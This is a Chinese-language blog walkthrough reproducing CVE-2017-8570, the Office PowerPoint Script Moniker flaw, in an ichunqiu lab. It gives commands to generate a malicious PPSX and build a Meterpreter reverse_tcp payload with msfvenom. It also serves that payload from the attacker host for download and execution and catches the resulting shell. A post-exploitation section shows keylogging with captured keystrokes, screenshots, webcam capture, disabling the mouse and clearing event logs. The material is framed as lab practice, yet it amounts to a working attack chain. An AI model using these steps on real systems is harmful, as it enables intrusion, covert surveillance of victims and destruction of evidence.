zoukankan      html  css  js  c++  java
  • CVE-2017-8570漏洞利用

    CVE-2017-8570漏洞是一个逻辑漏洞,利用方法简单,影响范围广。由于该漏洞和三年前的SandWorm(沙虫)漏洞非常类似,因此我们称之为“沙虫”二代漏洞。

    编号

    CVE-2017-8570

    影响版本

    Microsoft Office 2007 Service Pack 3
    Microsoft Office 2010 Service Pack 2 (32-bit editions)
    Microsoft Office 2010 Service Pack 2 (64-bit editions)
    Microsoft Office 2013 RT Service Pack 1
    Microsoft Office 2013 Service Pack 1 (32-bit editions)
    Microsoft Office 2013 Service Pack 1 (64-bit editions)
    Microsoft Office 2016 (32-bit edition)
    Microsoft Office 2016 (64-bit edition)

    危害

    2017年7月,微软在例行的月度补丁中修复了多个Microsoft Office漏洞,其中的CVE-2017-8570漏洞为一个逻辑漏洞,利用方法简单。网上已经出现该漏洞的利用代码,影响范围较广。

    该漏洞为Microsoft Office的一个远程代码执行漏洞。其成因是Microsoft PowerPoint执行时会初始化Script”Moniker对象,而在PowerPoint播放动画期间会激活该对象,从而执行sct脚本(Windows Script Component)文件。攻击者可以欺骗用户运行含有该漏洞的PPT文件,导致获取和当前登录用户相同的代码执行权限。

    复现漏洞

     这个漏洞并没有进行搭建环境,是因为有更好的选择,发现ichunqiu里面有靶机,可以进行练习。靶机链接(https://www.ichunqiu.com/vm/58919/1)

    实验环境

    • 操作机:windows7 x64

    • IP:172.16.11.2

    • 目标机:Kali Linux

    • IP:172.16.12.2

    实验步骤

    步骤1:生成恶意的PPSX文件

    我们首先使用Xshell连接Kali机器,点击桌面Xshell图标,输入IP:172.16.12.2,账号为:root 密码:123456 ,如图:

    首先我们在Kali中执行如下命令:

    cd  CVE-2017-8570       //进入exploit的目录
    
    python cve-2017-8570_toolkit.py  -M gen -w orange.ppsx -u http://172.16.12.2/logo.doc       //生成ppsx恶意文件

    接下来将我们生成恶意PPSX文件通过调用Powershell下载并执行。

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.12.2 LPORT=4444 -f exe > /tmp/shell.exe

    其中 -p 参数是 payload的意思,是使用windows的meterpreter的反弹文件-f参数 指定输出文件后缀为exe文件再用>重定向输出到tmp目录下

    接下来输入如下命令:

    python cve-2017-8570_toolkit.py -M exp -e http://172.16.12.2/shell.exe -l /tmp/shell.exe
    

     这段命令是通过脚本在80端口监听,等待接收ppsx请求并下载执行我们的反弹文件

    接下来进入Metasploit,新建一个Kali`172.16.12.2的连接,设置相关参数,接受返回的Shell

    msfconsole
    use multi/handler   //使用监听模块
    set payload windows/meterpreter/reverse_tcp    //设置Payload
    set LHOST 172.16.12.2   //设置本地接收IP
    run

    可以看到我们的Metaspliot已经在本地开启监听

    到此我们的所有准备都做好,下一步我们模拟用户点击恶意文件

    步骤2:目标机器执行恶意PPSX文件

    我们使用桌面Xftp软件,连接上目标机172.16.12.2,将Invoice.ppsx文件拖到当前桌面上。

    如图,他是一个PPT文件,我们模拟用户双击打开它。

    执行过程中可以看到代码通过调用powershell在远程下载执行我们的恶意文件,此时已经反弹回了shell

    使用命令:

    getuid     //获取当前用户ID

    这样就获取了目标机器的权限,可以通过Metasploit去执行命令。

    至此这个漏洞复现完毕。

    后续渗透

    截图

    meterpreter > screenshot
    Screenshot saved to: /home/ctf/ccoDxgvg.jpeg

    键盘记录

    meterpreter > keyscan_start          # 开启键盘记录
    Starting the keystroke sniffer...
    
    meterpreter > keyscan_dump           #查看键盘记录内容
    Dumping captured keystrokes...
    
    **
    -[ C:softSogouExplorerSogouExplorer.exe
    -[ @ 2017年8月13日 4:07:31 UTC
    **
    <Shift>xiaojiejie <Shift>chain<^H><^H><^H>inajoy<CR>
    
    meterpreter > keyscan_stop            #关闭键盘记录

     

    请除日志

    `meterpreter > clearev``

     

    关机

    meterpreter > shutdown

     

    截屏

    meterpreter >screenshot

     

    摄像头列表

    meterpreter > webcam_list

     

    打开摄像头

    meterpreter > webcam_snap

     

    禁止目标使用鼠标

    meterpreter > uictl disable mouse

     

    启用目标使用键盘

    meterpreter > uictl enable keyboard

     

    上传文件

    meterpreter >  upload /home/ctf/Desktop/快别看小姐姐了你被黑啦.txt C:\users\gg\Desktop

    把我们的友情提示上传到win7系统主人的 电脑桌面上

    ctf@guoguang:~/Desktop$ cat 快别看小姐姐了你被黑啦.txt 
    整天不是逛B站 就是 逛A站
    除了看小姐姐 还是看小姐姐!~~
    (严肃脸)我只想对你说 4个字:
    请带上我
    meterpreter >  upload /home/ctf/Desktop/快别看小姐姐了你被黑啦.txt C:\users\gg\Desktop
    [*] uploading : home/ctf/Desktop/快别看小姐姐了你被黑啦.txt -> C:usersggDesktop
    [*] uploaded  : home/ctf/Desktop/快别看小姐姐了你被黑啦.txt -> C:usersggDesktop快别看小姐姐了你被黑啦.txt

    shell

    meterpreter > shell

    shell 顾名思义就是shell了,这个命令相当于完全控制了windows的cmd命令行,可以执行任意cmd操作,当然只要权限足够大的话。

    任重而道远!

  • 相关阅读:
    hadoop再次集群搭建(3)-如何选择相应的hadoop版本
    48. Rotate Image
    352. Data Stream as Disjoint Interval
    163. Missing Ranges
    228. Summary Ranges
    147. Insertion Sort List
    324. Wiggle Sort II
    215. Kth Largest Element in an Array
    快速排序
    280. Wiggle Sort
  • 原文地址:https://www.cnblogs.com/Oran9e/p/8067528.html
Copyright © 2011-2022 走看看